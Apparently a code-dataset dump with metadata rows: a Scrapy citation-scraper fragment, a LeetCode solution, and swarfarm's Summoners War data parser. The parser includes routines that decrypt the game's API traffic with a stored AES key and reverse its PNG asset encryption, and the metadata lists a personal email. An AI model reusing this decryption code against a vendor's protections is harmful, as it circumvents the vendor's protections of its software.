logging.info('Processing --> ' + response.url)
article = ArticleItem()
result = {
'title' : '',
'authors': '',
'country': '',
'abstract': '',
'date_pub': '',
'journal': '',
}
article['title'] = response.xpath('//*/article/*/div[@class="citation"]/div/h1[@class="citation__title"]').get(default='')
authors = response.xpath('//*/div[@class="citation"]/div/div/ul/li/a/@title').getall()
article['authors'] = '|'.join(authors)
article['country'] = ''
article['abstract'] = response.xpath('//*/div[contains(@class,"abstractSection")]/p').get(default='')
article['date_pub'] = response.xpath('//*/span[@class="epub-section__date"]').get(default='')
article['journal'] = response.xpath('//*/span[@class="epub-section__title"]').get(default='')
article['topic'] = self.topic
article['latitude'] = ''
article['longitude'] = ''
yield article
| [
"abdelbari1996@hotmail.com"
] | abdelbari1996@hotmail.com |
196350b247e6e73f9e41c83c7b55dd2e29bd78ff | bd8bc7abe0f774f84d8275c43b2b8c223d757865 | /319_BulbSwitcher/bulbSwitch.py | 4de5dafd05b7f22e9e8a57594d76e8b90b6370fc | [
"MIT"
] | permissive | excaliburnan/SolutionsOnLeetcodeForZZW | bde33ab9aebe9c80d9f16f9a62df72d269c5e187 | 64018a9ead8731ef98d48ab3bbd9d1dd6410c6e7 | refs/heads/master | 2023-04-07T03:00:06.315574 | 2021-04-21T02:12:39 | 2021-04-21T02:12:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | class Solution:
def bulbSwitch(self, n: int) -> int:
return math.floor(math.sqrt(n))
| [
"noreply@github.com"
] | excaliburnan.noreply@github.com |
4b455ab46b88e01a9384c549a1c0160ffe5018b5 | 30fce7251d3ba9f3868fff08fdb9ab9a0a6ff23b | /bestiary/com2us_data_parser.py | a6bee9ce7a41abf17e7623b532a5cde97f6f2d30 | [
"Apache-2.0"
] | permissive | alinford/swarfarm | 16fd07d313c5d6453a957468336dab8eb6cc3cd7 | 95042e4bb685b6f2f4e887ee22e8dad0625a46bf | refs/heads/master | 2020-06-02T11:53:13.013695 | 2019-06-08T05:32:23 | 2019-06-08T05:32:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 49,171 | py | import base64
import binascii
import csv
import json
import re
import zlib
from enum import IntEnum
from glob import iglob
from numbers import Number
from Crypto.Cipher import AES
from PIL import Image
from bitstring import Bits, BitStream, ConstBitStream, ReadError
from django.conf import settings
from sympy import simplify
from bestiary.com2us_mapping import *
from .models import Skill, ScalingStat, SkillEffect, CraftMaterial, MonsterCraftCost, HomunculusSkill, \
HomunculusSkillCraftCost, Dungeon, SecretDungeon, Level
def _decrypt(msg):
obj = AES.new(
bytes(settings.SUMMONERS_WAR_SECRET_KEY, encoding='latin-1'),
AES.MODE_CBC,
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
)
decrypted = obj.decrypt(msg)
return decrypted[:-decrypted[-1]]
def decrypt_request(msg):
return _decrypt(base64.b64decode(msg))
def decrypt_response(msg):
decoded = base64.b64decode(msg)
decrypted = _decrypt(decoded)
decompressed = zlib.decompress(decrypted)
return decompressed
def update_all():
decrypt_com2us_png()
crop_monster_images()
parse_skill_data()
parse_monster_data()
parse_monster_data() # Runs twice to set awakens to/from relationships which is not possible until after both monsters are created
parse_homunculus_data()
def _create_new_skill(com2us_id, slot):
print('!!! Creating new skill with com2us ID {}, slot {}'.format(com2us_id, slot))
return Skill.objects.create(com2us_id=com2us_id, name='tempname', slot=slot, max_level=1)
PLAIN_OPERATORS = '+-*/^'
def _force_eval_ltr(expr):
fixed = False
if isinstance(expr, list):
# Check if elements are strings or another array
if expr and all(isinstance(elem, str) or isinstance(elem, Number) for elem in expr):
expr_string = ''.join(map(str, expr))
if 'FIXED' in expr_string:
fixed = True
expr_string = expr_string.replace('FIXED', '')
if 'CEIL' in expr_string:
expr_string = expr_string.replace('CEIL', '')
# Remove any multiplications by 1 beforehand. It makes the simplifier function happier.
expr_string = expr_string.replace('*1.0', '')
if expr_string not in PLAIN_OPERATORS:
all_operations = filter(None, re.split(r'([+\-*/^])', expr_string))
operands = list(filter(None, re.split(r'[+\-*/^]', expr_string)))
group_formula = '(' * len(operands)
for operator in all_operations:
if operator in PLAIN_OPERATORS:
group_formula += operator
else:
group_formula += f'{operator})'
return f'({group_formula})', fixed
else:
return f'{expr_string}', fixed
else:
# Process each sub-expression in LTR manner
ltr_expr = ''
for partial_expr in expr:
partial_expr_ltr, fixed = _force_eval_ltr(partial_expr)
if partial_expr_ltr not in PLAIN_OPERATORS:
ltr_expr = f'({ltr_expr}{partial_expr_ltr})'
else:
ltr_expr += partial_expr_ltr
return ltr_expr, fixed
def parse_skill_data(preview=False):
monster_table = _get_localvalue_tables(LocalvalueTables.MONSTERS)
skill_table = _get_localvalue_tables(LocalvalueTables.SKILLS)
skill_names = get_skill_names_by_id()
skill_descriptions = get_skill_descs_by_id()
homunculus_skill_table = _get_localvalue_tables(LocalvalueTables.HOMUNCULUS_SKILL_TREES)
homunculus_skill_list = [json.loads(row['master id']) for row in homunculus_skill_table['rows']]
scaling_stats = ScalingStat.objects.all()
ignore_def_effect = SkillEffect.objects.get(name='Ignore DEF')
# Tracking IDs of skills with known issues
golem_def_skills = [2401, 2402, 2403, 2404, 2405, 2406, 2407, 2410]
noble_agreement_speed_id = 6519
holy_light_id = 2909
for skill_data in skill_table['rows']:
# Get matching skill in DB
master_id = json.loads(skill_data['master id'])
# Skip it if no translation exists
if master_id not in skill_names or master_id not in skill_descriptions:
continue
###############################################################################################
# KNOWN ISSUES W/ SOURCE DATA
# skills with known issues are forcefully modified here. May need updating if skills are updated.
###############################################################################################
if master_id in golem_def_skills:
# Some golem skills use ATTACK_DEF scaling variable, which is the same as DEF that every other monster has
skill_data['fun data'] = skill_data['fun data'].replace('ATTACK_DEF', 'DEF')
if master_id == noble_agreement_speed_id:
# Skill has different formula compared to other speed skills, so we're gonna set it here
# It makes no difference to Com2US because they evaluate formulas right to left instead of using order of operations
skill_data['fun data'] = '[["ATK", "*", 1.0], ["*"], ["ATTACK_SPEED", "+", 240], ["/"], [60]]'
if master_id == holy_light_id:
# This is a heal skill, but multiplier in game files is for an attack.
# Setting multiplier formula based on skill description.
skill_data['fun data'] = '[["TARGET_CUR_HP", "*", 0.15]]'
updated = False
try:
skill = Skill.objects.get(com2us_id=master_id)
except Skill.DoesNotExist:
# Check if it is used on any monster. If so, create it
# Homunculus skills beyond the starting set are not listed in the monster table
skill = None
if master_id in homunculus_skill_list:
for homu_skill in homunculus_skill_table['rows']:
if master_id == json.loads(homu_skill['master id']):
slot = json.loads(homu_skill['slot'])
skill = _create_new_skill(master_id, slot)
break
else:
for monster in monster_table['rows']:
skill_array = json.loads(monster['base skill'])
if master_id in skill_array:
slot = skill_array.index(master_id) + 1
skill = _create_new_skill(master_id, slot)
break
if skill is None:
print('Skill ID {} is not used anywhere, skipping...'.format(master_id))
continue
else:
updated = True
# Name
if skill.name != skill_names[master_id]:
skill.name = skill_names[master_id]
print('Updated name to {}'.format(skill.name))
updated = True
# Description
if skill.description != skill_descriptions[master_id]:
skill.description = skill_descriptions[master_id]
print('Updated description to {}'.format(skill.description))
updated = True
# Icon
icon_nums = json.loads(skill_data['thumbnail'])
icon_filename = 'skill_icon_{0:04d}_{1}_{2}.png'.format(*icon_nums)
if skill.icon_filename != icon_filename:
skill.icon_filename = icon_filename
print('Updated icon to {}'.format(skill.icon_filename))
updated = True
# Cooltime
cooltime = json.loads(skill_data['cool time']) + 1 if json.loads(skill_data['cool time']) > 0 else None
if skill.cooltime != cooltime:
skill.cooltime = cooltime
print('Updated cooltime to {}'.format(skill.cooltime))
updated = True
# Max Level
max_lv = json.loads(skill_data['max level'])
if skill.max_level != max_lv:
skill.max_level = max_lv
print('Updated max level to {}'.format(skill.max_level))
updated = True
# Level up progress
level_up_desc = {
'DR': 'Effect Rate +{0}%',
'AT': 'Damage +{0}%',
'AT1': 'Damage +{0}%',
'HE': 'Recovery +{0}%',
'TN': 'Cooltime Turn -{0}',
'SD': 'Shield +{0}%',
'SD1': 'Shield +{0}%',
}
level_up_text = ''
for level in json.loads(skill_data['level']):
level_up_text += level_up_desc[level[0]].format(level[1]) + '\n'
if skill.level_progress_description != level_up_text:
skill.level_progress_description = level_up_text
print('Updated level-up progress description')
updated = True
# Buffs
# maybe this later. Data seems incomplete sometimes.
# Scaling formula and stats
skill.scaling_stats.clear()
# Skill multiplier formula
if skill.multiplier_formula_raw != skill_data['fun data']:
skill.multiplier_formula_raw = skill_data['fun data']
print('Updated raw multiplier formula to {}'.format(skill.multiplier_formula_raw))
updated = True
formula, fixed = _force_eval_ltr(json.loads(skill_data['fun data']))
if formula:
formula = str(simplify(formula))
# Find the scaling stat used in this section of formula
for stat in scaling_stats:
if stat.com2us_desc in formula:
skill.scaling_stats.add(stat)
formula = formula.replace(stat.com2us_desc, f'{{{stat.stat}}}')
if fixed:
formula += ' (Fixed)'
if skill.multiplier_formula != formula:
skill.multiplier_formula = formula
print('Updated multiplier formula to {}'.format(skill.multiplier_formula))
updated = True
# Finally save it if required
if updated:
print('Updated skill {}\n'.format(str(skill)))
if not preview:
skill.save()
if preview:
print('No changes were saved.')
def parse_monster_data(preview=False):
monster_table = _get_localvalue_tables(LocalvalueTables.MONSTERS)
monster_names = get_monster_names_by_id()
# List of monsters that data indicates are not obtainable, but actually are
# Dark cow girl
# Vampire Lord
definitely_obtainable_monsters = [19305, 19315, 23005, 23015]
for row in monster_table['rows']:
master_id = json.loads(row['unit master id'])
# Skip it if no name translation exists
if master_id not in monster_names:
continue
try:
monster = Monster.objects.get(com2us_id=master_id)
updated = False
except Monster.DoesNotExist:
monster = Monster.objects.create(com2us_id=master_id, obtainable=False, name='tempname', base_stars=1)
print('!!! Creating new monster {} with com2us ID {}'.format(monster_names[master_id], master_id))
updated = True
monster_family = json.loads(row['group id'])
if monster.family_id != monster_family:
monster.family_id = monster_family
print('Updated {} ({}) family ID to {}'.format(monster, master_id, monster_family))
updated = True
# Name
if monster.name != monster_names[master_id]:
print("Updated {} ({}) name to {}".format(monster, master_id, monster_names[master_id]))
monster.name = monster_names[master_id]
updated = True
# Archetype
archetype = archetype_map.get(json.loads(row['style type']))
if monster.archetype != archetype:
monster.archetype = archetype
print('Updated {} ({}) archetype to {}'.format(monster, master_id, monster.get_archetype_display()))
updated = True
# Element
element = element_map[json.loads(row['attribute'])]
if monster.element != element:
monster.element = element
print('Updated {} ({}) element to {}'.format(monster, master_id, element))
updated = True
# Obtainable
obtainable = sum(json.loads(row['collection view'])) > 0 or master_id in definitely_obtainable_monsters
if monster.obtainable != obtainable:
monster.obtainable = obtainable
print('Updated {} ({}) obtainability to {}'.format(monster, master_id, obtainable))
updated = True
# Homunculus
is_homunculus = bool(json.loads(row['homunculus']))
if monster.homunculus != is_homunculus:
monster.homunculus = is_homunculus
print('Updated {} ({}) homunculus status to {}'.format(monster, master_id, is_homunculus))
updated = True
# Unicorn
transforms_into_id = json.loads(row['change'])
if transforms_into_id != 0:
try:
transforms_into = Monster.objects.get(com2us_id=transforms_into_id)
except Monster.DoesNotExist:
print('!!! {} ({}) can transform into {} but could not find transform monster in database'.format(monster, master_id, transforms_into_id))
else:
if monster.transforms_into != transforms_into:
monster.transforms_into = transforms_into
print('Updated {} ({}) can transform into {} ({})'.format(monster, master_id, transforms_into, transforms_into_id))
updated = True
else:
if monster.transforms_into is not None:
monster.transforms_into = None
print('Removed monster transformation from {} ({})'.format(monster, master_id))
updated = True
# Stats
if monster.base_stars != json.loads(row['base class']):
monster.base_stars = json.loads(row['base class'])
print('Updated {} ({}) base stars to {}'.format(monster, master_id, monster.base_stars))
updated = True
if monster.raw_hp != json.loads(row['base con']):
monster.raw_hp = json.loads(row['base con'])
print('Updated {} ({}) raw HP to {}'.format(monster, master_id, monster.raw_hp))
updated = True
if monster.raw_attack != json.loads(row['base atk']):
monster.raw_attack = json.loads(row['base atk'])
print('Updated {} ({}) raw attack to {}'.format(monster, master_id, monster.raw_attack))
updated = True
if monster.raw_defense != json.loads(row['base def']):
monster.raw_defense = json.loads(row['base def'])
print('Updated {} ({}) raw defense to {}'.format(monster, master_id, monster.raw_defense))
updated = True
if monster.resistance != json.loads(row['resistance']):
monster.resistance = json.loads(row['resistance'])
print('Updated {} ({}) resistance to {}'.format(monster, master_id, monster.resistance))
updated = True
if monster.accuracy != json.loads(row['accuracy']):
monster.accuracy = json.loads(row['accuracy'])
print('Updated {} ({}) accuracy to {}'.format(monster, master_id, monster.accuracy))
updated = True
if monster.speed != json.loads(row['base speed']):
monster.speed = json.loads(row['base speed'])
print('Updated {} ({}) speed to {}'.format(monster, master_id, monster.speed))
updated = True
if monster.crit_rate != json.loads(row['critical rate']):
monster.crit_rate = json.loads(row['critical rate'])
print('Updated {} ({}) critical rate to {}'.format(monster, master_id, monster.crit_rate))
updated = True
if monster.crit_damage != json.loads(row['critical damage']):
monster.crit_damage = json.loads(row['critical damage'])
print('Updated {} ({}) critical damage to {}'.format(monster, master_id, monster.crit_damage))
updated = True
# Awakening
awakened = row['unit master id'][-2] == '1'
awakens_to_com2us_id = json.loads(row['awaken unit id'])
if awakened != monster.is_awakened:
monster.is_awakened = awakened
print('Updated {} ({}) awakened status to {}'.format(monster, master_id, monster.is_awakened))
updated = True
if monster.can_awaken != (awakened or awakens_to_com2us_id > 0):
monster.can_awaken = (awakened or awakens_to_com2us_id > 0)
print('Updated {} ({}) can awaken status to {}'.format(monster, master_id, monster.can_awaken))
if monster.can_awaken and not monster.is_awakened:
# Auto-assign awakens_to if possible (which will auto-update awakens_from on other monster)
try:
awakens_to_monster = Monster.objects.get(com2us_id=awakens_to_com2us_id)
except Monster.DoesNotExist:
print('!!! {} ({}) can awaken but could not find awakened monster in database'.format(monster, master_id))
else:
if monster.awakens_to != awakens_to_monster:
monster.awakens_to = awakens_to_monster
print('Updated {} ({}) awakened version to {}'.format(monster, master_id, awakens_to_monster))
updated = True
awaken_materials = json.loads(row['awaken materials'])
essences = [x[0] for x in awaken_materials] # Extract the essences actually used.
# Set the essences not used to 0
if 11001 not in essences and monster.awaken_mats_water_low != 0:
monster.awaken_mats_water_low = 0
print("Updated {} ({}) water low awakening essence to 0.".format(monster, master_id))
updated = True
if 12001 not in essences and monster.awaken_mats_water_mid != 0:
monster.awaken_mats_water_mid = 0
print("Updated {} ({}) water mid awakening essence to 0.".format(monster, master_id))
updated = True
if 13001 not in essences and monster.awaken_mats_water_high != 0:
monster.awaken_mats_water_high = 0
print("Updated {} ({}) water high awakening essence to 0.".format(monster, master_id))
updated = True
if 11002 not in essences and monster.awaken_mats_fire_low != 0:
monster.awaken_mats_fire_low = 0
print("Updated {} ({}) fire low awakening essence to 0.".format(monster, master_id))
updated = True
if 12002 not in essences and monster.awaken_mats_fire_mid != 0:
monster.awaken_mats_fire_mid = 0
print("Updated {} ({}) fire mid awakening essence to 0.".format(monster, master_id))
updated = True
if 13002 not in essences and monster.awaken_mats_fire_high != 0:
monster.awaken_mats_fire_high = 0
print("Updated {} ({}) fire high awakening essence to 0.".format(monster, master_id))
updated = True
if 11003 not in essences and monster.awaken_mats_wind_low != 0:
monster.awaken_mats_wind_low = 0
print("Updated {} ({}) wind low awakening essence to 0.".format(monster, master_id))
updated = True
if 12003 not in essences and monster.awaken_mats_wind_mid != 0:
monster.awaken_mats_wind_mid = 0
print("Updated {} ({}) wind mid awakening essence to 0.".format(monster, master_id))
updated = True
if 13003 not in essences and monster.awaken_mats_wind_high != 0:
monster.awaken_mats_wind_high = 0
print("Updated {} ({}) wind high awakening essence to 0.".format(monster, master_id))
updated = True
if 11004 not in essences and monster.awaken_mats_light_low != 0:
monster.awaken_mats_light_low = 0
print("Updated {} ({}) light low awakening essence to 0.".format(monster, master_id))
updated = True
if 12004 not in essences and monster.awaken_mats_light_mid != 0:
monster.awaken_mats_light_mid = 0
print("Updated {} ({}) light mid awakening essence to 0.".format(monster, master_id))
updated = True
if 13004 not in essences and monster.awaken_mats_light_high != 0:
monster.awaken_mats_light_high = 0
print("Updated {} ({}) light high awakening essence to 0.".format(monster, master_id))
updated = True
if 11005 not in essences and monster.awaken_mats_dark_low != 0:
monster.awaken_mats_dark_low = 0
print("Updated {} ({}) dark low awakening essence to 0.".format(monster, master_id))
updated = True
if 12005 not in essences and monster.awaken_mats_dark_mid != 0:
monster.awaken_mats_dark_mid = 0
print("Updated {} ({}) dark mid awakening essence to 0.".format(monster, master_id))
updated = True
if 13005 not in essences and monster.awaken_mats_dark_high != 0:
monster.awaken_mats_dark_high = 0
print("Updated {} ({}) dark high awakening essence to 0.".format(monster, master_id))
updated = True
if 11006 not in essences and monster.awaken_mats_magic_low != 0:
monster.awaken_mats_magic_low = 0
print("Updated {} ({}) magic low awakening essence to 0.".format(monster, master_id))
updated = True
if 12006 not in essences and monster.awaken_mats_magic_mid != 0:
monster.awaken_mats_magic_mid = 0
print("Updated {} ({}) magic mid awakening essence to 0.".format(monster, master_id))
updated = True
if 13006 not in essences and monster.awaken_mats_magic_high != 0:
monster.awaken_mats_magic_high = 0
print("Updated {} ({}) magic high awakening essence to 0.".format(monster, master_id))
updated = True
# Fill in values for the essences specified
for essence in awaken_materials:
if essence[0] == 11001 and monster.awaken_mats_water_low != essence[1]:
monster.awaken_mats_water_low = essence[1]
print("Updated {} ({}) water low awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 12001 and monster.awaken_mats_water_mid != essence[1]:
monster.awaken_mats_water_mid = essence[1]
print("Updated {} ({}) water mid awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 13001 and monster.awaken_mats_water_high != essence[1]:
monster.awaken_mats_water_high = essence[1]
print("Updated {} ({}) water high awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 11002 and monster.awaken_mats_fire_low != essence[1]:
monster.awaken_mats_fire_low = essence[1]
print("Updated {} ({}) fire low awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 12002 and monster.awaken_mats_fire_mid != essence[1]:
monster.awaken_mats_fire_mid = essence[1]
print("Updated {} ({}) fire mid awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 13002 and monster.awaken_mats_fire_high != essence[1]:
monster.awaken_mats_fire_high = essence[1]
print("Updated {} ({}) fire high awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 11003 and monster.awaken_mats_wind_low != essence[1]:
monster.awaken_mats_wind_low = essence[1]
print("Updated {} ({}) wind low awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 12003 and monster.awaken_mats_wind_mid != essence[1]:
monster.awaken_mats_wind_mid = essence[1]
print("Updated {} ({}) wind mid awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 13003 and monster.awaken_mats_wind_high != essence[1]:
monster.awaken_mats_wind_high = essence[1]
print("Updated {} ({}) wind high awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 11004 and monster.awaken_mats_light_low != essence[1]:
monster.awaken_mats_light_low = essence[1]
print("Updated {} ({}) light low awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 12004 and monster.awaken_mats_light_mid != essence[1]:
monster.awaken_mats_light_mid = essence[1]
print("Updated {} ({}) light mid awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 13004 and monster.awaken_mats_light_high != essence[1]:
monster.awaken_mats_light_high = essence[1]
print("Updated {} ({}) light high awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 11005 and monster.awaken_mats_dark_low != essence[1]:
monster.awaken_mats_dark_low = essence[1]
print("Updated {} ({}) dark low awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 12005 and monster.awaken_mats_dark_mid != essence[1]:
monster.awaken_mats_dark_mid = essence[1]
print("Updated {} ({}) dark mid awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 13005 and monster.awaken_mats_dark_high != essence[1]:
monster.awaken_mats_dark_high = essence[1]
print("Updated {} ({}) dark high awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 11006 and monster.awaken_mats_magic_low != essence[1]:
monster.awaken_mats_magic_low = essence[1]
print("Updated {} ({}) magic low awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 12006 and monster.awaken_mats_magic_mid != essence[1]:
monster.awaken_mats_magic_mid = essence[1]
print("Updated {} ({}) magic mid awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
elif essence[0] == 13006 and monster.awaken_mats_magic_high != essence[1]:
monster.awaken_mats_magic_high = essence[1]
print("Updated {} ({}) magic high awakening essence to {}".format(monster, master_id, essence[1]))
updated = True
# Leader skill
# Data is a 5 element array
# [0] - arbitrary unique ID
# [1] - Area of effect: see com2us_mapping.leader_skill_area_map
# [2] - Element: see com2us_mapping.element_map
# [3] - Stat: see com2us_mapping.leader_skill_stat_map
# [4] - Value of skill bonus
leader_skill_data = json.loads(row['leader skill'])
if leader_skill_data:
stat = leader_skill_stat_map[leader_skill_data[3]]
value = int(leader_skill_data[4] * 100)
if leader_skill_data[2]:
area = LeaderSkill.AREA_ELEMENT
element = element_map[leader_skill_data[2]]
else:
area = leader_skill_area_map[leader_skill_data[1]]
element = None
try:
matching_skill = LeaderSkill.objects.get(attribute=stat, amount=value, area=area, element=element)
except LeaderSkill.DoesNotExist:
# Create the new leader skill
matching_skill = LeaderSkill.objects.create(attribute=stat, amount=value, area=area, element=element)
if monster.leader_skill != matching_skill:
monster.leader_skill = matching_skill
print('Updated {} ({}) leader skill to {}'.format(monster, master_id, matching_skill))
updated = True
else:
if monster.leader_skill is not None:
monster.leader_skill = None
print('Removed ({}) leader skill from {}'.format(monster, master_id))
updated = True
# Skills
existing_skills = monster.skills.all()
skill_set = Skill.objects.filter(com2us_id__in=json.loads(row['base skill']))
if set(existing_skills) != set(skill_set):
if not preview:
monster.skills.set(skill_set)
print("Updated {} ({}) skill set".format(monster, master_id))
# updated=True skipped because m2m relationship set directly
skill_max_levels = skill_set.values_list('max_level', flat=True)
skill_ups_to_max = sum(skill_max_levels) - len(skill_max_levels)
if monster.skill_ups_to_max != skill_ups_to_max:
monster.skill_ups_to_max = skill_ups_to_max
print(f'Updated {monster} ({master_id}) skill ups to max to {skill_ups_to_max}.')
updated = True
# Icon
icon_nums = json.loads(row['thumbnail'])
icon_filename = 'unit_icon_{0:04d}_{1}_{2}.png'.format(*icon_nums)
if monster.image_filename != icon_filename:
monster.image_filename = icon_filename
print("Updated {} ({}) icon filename".format(monster, master_id))
updated = True
if updated and not preview:
monster.save()
print('Saved changes to {} ({})\n'.format(monster, master_id))
if preview:
print('No changes were saved.')
def parse_homunculus_data():
# Homunculus craft costs
craft_cost_table = _get_localvalue_tables(LocalvalueTables.HOMUNCULUS_CRAFT_COSTS)
for row in craft_cost_table['rows']:
mana_cost = json.loads(row['craft cost'])[2]
for monster_id in json.loads(row['unit master id']):
monster = Monster.objects.get(com2us_id=monster_id)
monster.craft_cost = mana_cost
print('Set craft cost of {} ({}) to {}'.format(monster, monster.com2us_id, mana_cost))
monster.save()
# Material costs - clear and re-init
monster.monstercraftcost_set.all().delete()
for material_cost in json.loads(row['craft stuff']):
qty = material_cost[2]
material = CraftMaterial.objects.get(com2us_id=material_cost[1])
craft_cost = MonsterCraftCost.objects.create(monster=monster, craft=material, quantity=qty)
print('Set craft material {} on {} ({})'.format(craft_cost, monster, monster.com2us_id))
# Homunculus skill costs/requirements
skill_table = _get_localvalue_tables(LocalvalueTables.HOMUNCULUS_SKILL_TREES)
for row in skill_table['rows']:
skill_id = json.loads(row['master id'])
print('\nUpdating skill upgrade recipe for {}'.format(skill_id))
try:
skill = HomunculusSkill.objects.get(skill__com2us_id=skill_id)
except HomunculusSkill.DoesNotExist:
skill = HomunculusSkill.objects.create(skill=Skill.objects.get(com2us_id=skill_id))
skill.mana_cost = json.loads(row['upgrade cost'])[2]
print('Set upgrade cost of {} upgrade recipe to {}'.format(skill, skill.mana_cost))
skill.save()
monsters_used_on_ids = json.loads(row['unit master id'])
monsters_used_on = Monster.objects.filter(com2us_id__in=monsters_used_on_ids)
skill.monsters.set(monsters_used_on, clear=True)
print('Set monster list of {} upgrade recipe to {}'.format(skill, list(skill.monsters.values_list('name', 'com2us_id'))))
prerequisite_skill_ids = json.loads(row['prerequisite'])
prerequisite_skills = Skill.objects.filter(com2us_id__in=prerequisite_skill_ids)
skill.prerequisites.set(prerequisite_skills, clear=True)
print('Set prerequisite skills of {} upgrade recipe to {}'.format(skill, list(skill.prerequisites.values_list('name', 'com2us_id'))))
# Material costs - clear and re-init
skill.homunculusskillcraftcost_set.all().delete()
for material_cost in json.loads(row['upgrade stuff']):
qty = material_cost[2]
material = CraftMaterial.objects.get(com2us_id=material_cost[1])
upgrade_cost = HomunculusSkillCraftCost.objects.create(skill=skill, craft=material, quantity=qty)
print('Set upgrade material {} on {} upgrade recipe'.format(upgrade_cost, skill))
def crop_monster_images():
# If the image is 102x102, we need to crop out the 1px white border.
for im_path in iglob('herders/static/herders/images/monsters/*.png'):
im = Image.open(im_path)
if im.size == (102, 102):
crop = im.crop((1, 1, 101, 101))
im.close()
crop.save(im_path)
def decrypt_com2us_png():
com2us_decrypt_values = [
0x2f, 0x7c, 0x47, 0x55, 0x32, 0x77, 0x9f, 0xfb, 0x5b, 0x86, 0xfe, 0xb6, 0x3e, 0x06, 0xf4, 0xc4,
0x2e, 0x08, 0x49, 0x11, 0x0e, 0xce, 0x84, 0xd3, 0x7b, 0x18, 0xa6, 0x5c, 0x71, 0x56, 0xe2, 0x3b,
0xfd, 0xb3, 0x2b, 0x97, 0x9d, 0xfc, 0xca, 0xba, 0x8e, 0x7e, 0x6f, 0x0f, 0xe8, 0xbb, 0xc7, 0xc2,
0xd9, 0xa4, 0xd2, 0xe0, 0xa5, 0x95, 0xee, 0xab, 0xf3, 0xe4, 0xcb, 0x63, 0x25, 0x70, 0x4e, 0x8d,
0x21, 0x37, 0x9a, 0xb0, 0xbc, 0xc6, 0x48, 0x3f, 0x23, 0x80, 0x20, 0x01, 0xd7, 0xf9, 0x5e, 0xec,
0x16, 0xd6, 0xd4, 0x1f, 0x51, 0x42, 0x6c, 0x10, 0x14, 0xb7, 0xcc, 0x82, 0x7f, 0x13, 0x02, 0x00,
0x72, 0xed, 0x90, 0x57, 0xc1, 0x2c, 0x5d, 0x28, 0x81, 0x1d, 0x38, 0x1a, 0xac, 0xad, 0x35, 0x78,
0xdc, 0x68, 0xb9, 0x8b, 0x6a, 0xe1, 0xc3, 0xe3, 0xdb, 0x6d, 0x04, 0x27, 0x9c, 0x64, 0x5a, 0x8f,
0x83, 0x0c, 0xd8, 0xa8, 0x1c, 0x89, 0xd5, 0x43, 0x74, 0x73, 0x4d, 0xae, 0xea, 0x31, 0x6e, 0x1e,
0x91, 0x1b, 0x59, 0xc9, 0xbd, 0xf7, 0x07, 0xe7, 0x8a, 0x05, 0x8c, 0x4c, 0xbe, 0xc5, 0xdf, 0xe5,
0xf5, 0x2d, 0x4b, 0x76, 0x66, 0xf2, 0x50, 0xd0, 0xb4, 0x85, 0xef, 0xb5, 0x3c, 0x7d, 0x3d, 0xe6,
0x9b, 0x03, 0x0d, 0x61, 0x33, 0xf1, 0x92, 0x53, 0xff, 0x96, 0x09, 0x67, 0x69, 0x44, 0xa3, 0x4a,
0xaf, 0x41, 0xda, 0x54, 0x46, 0xd1, 0xfa, 0xcd, 0x24, 0xaa, 0x88, 0xa7, 0x19, 0xde, 0x40, 0xeb,
0x94, 0x5f, 0x45, 0x65, 0xf0, 0xb8, 0x34, 0xdd, 0x0b, 0xb1, 0x29, 0xe9, 0x2a, 0x75, 0x87, 0x39,
0xcf, 0x79, 0x93, 0xa1, 0xb2, 0x30, 0x15, 0x7a, 0x52, 0x12, 0x62, 0x36, 0xbf, 0x22, 0x4f, 0xc0,
0xa2, 0x17, 0xc8, 0x99, 0x3a, 0x60, 0xa9, 0xa0, 0x58, 0xf6, 0x0a, 0x9e, 0xf8, 0x6b, 0x26, 0x98
]
for im_path in iglob('herders/static/herders/images/**/*.png', recursive=True):
encrypted = BitStream(filename=im_path)
# Check if it is encrypted. 8th byte is 0x0B instead of the correct signature 0x0A
encrypted.pos = 0x07 * 8
signature = encrypted.peek('uint:8')
if signature == 0x0B:
print('Decrypting {}'.format(im_path))
# Correct the PNG signature
encrypted.overwrite('0x0A', encrypted.pos)
# Replace bits with magic decrypted values
try:
while True:
pos = encrypted.pos
val = encrypted.peek('uint:8')
encrypted.overwrite(Bits(uint=com2us_decrypt_values[val], length=8), pos)
except ReadError:
# EOF
pass
# Write it back to the file
with open(im_path, 'wb') as f:
encrypted.tofile(f)
class TranslationTables(IntEnum):
ISLAND_NAMES = 1
MONSTER_NAMES = 2
SUMMON_METHODS = 10
SKILL_NAMES = 20
SKILL_DESCRIPTIONS = 21
WORLD_MAP_DUNGEON_NAMES = 29
CAIROS_DUNGEON_NAMES = 30
def get_monster_names_by_id():
return _get_translation_tables()[TranslationTables.MONSTER_NAMES]
def get_skill_names_by_id():
return _get_translation_tables()[TranslationTables.SKILL_NAMES]
def get_skill_descs_by_id():
return _get_translation_tables()[TranslationTables.SKILL_DESCRIPTIONS]
# Dungeons and Scenarios
def parse_scenarios():
scenario_table = _get_localvalue_tables(LocalvalueTables.SCENARIO_LEVELS)
scenario_names = _get_scenario_names_by_id()
for row in scenario_table['rows']:
dungeon_id = int(row['region id'])
name = scenario_names[dungeon_id]
if name.strip() == '':
name = 'UNKNOWN'
# Update (or create) the dungeon this scenario level will be assigned to
dungeon, created = Dungeon.objects.update_or_create(
com2us_id=dungeon_id,
name=name,
